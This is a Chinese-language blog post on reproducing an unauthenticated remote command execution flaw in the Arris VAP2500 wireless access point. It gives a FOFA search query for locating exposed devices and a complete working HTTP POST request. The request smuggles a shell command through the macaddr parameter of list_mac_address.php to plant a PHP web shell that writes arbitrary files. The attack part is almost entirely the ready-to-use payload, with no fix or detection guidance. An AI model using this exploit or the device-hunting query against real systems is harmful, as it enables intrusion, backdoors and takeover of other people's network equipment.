Arris VAP2500 list_mac_address未授权RCE漏洞复现

0x01 产品简介

Arris VAP2500是美国Arris集团公司的一款无线接入器产品。

0x02 漏洞概述

Arris VAP2500 list_mac_address接口处命令执行漏洞,未授权的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:body="./images/lg_05_1.gif"

040e1f263a40487bafbb7b22d592e0f8.png

0x04 漏洞复现

 写一个可以创建文件的脚本到指定目录

POST /list_mac_address.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded

macaddr=00%3A00%3A44%3A00%3A00%3A00%3Becho+%27%3C%3Fphp+file_put_contents%28%24_POST%5B%22filename%22%5D%2C+%24_POST%5B%22content%22%5D%29%3F%3E%27%3E+%2Fvar%2Fwww%2Ftest.php&action=0&settype=1

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2023-12-15 05:36:04       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-15 05:36:04       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-15 05:36:04       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-15 05:36:04       20 阅读

热门阅读

  1. uni-app地图标点展示

    2023-12-15 05:36:04       37 阅读
  2. 小区生活污水处理设备生产厂家讲解

    2023-12-15 05:36:04       39 阅读
  3. 量子技术将如何重构我们的生活

    2023-12-15 05:36:04       43 阅读
  4. DPDK多进程之间的通信

    2023-12-15 05:36:04       46 阅读
  5. 人脸检测算法

    2023-12-15 05:36:04       32 阅读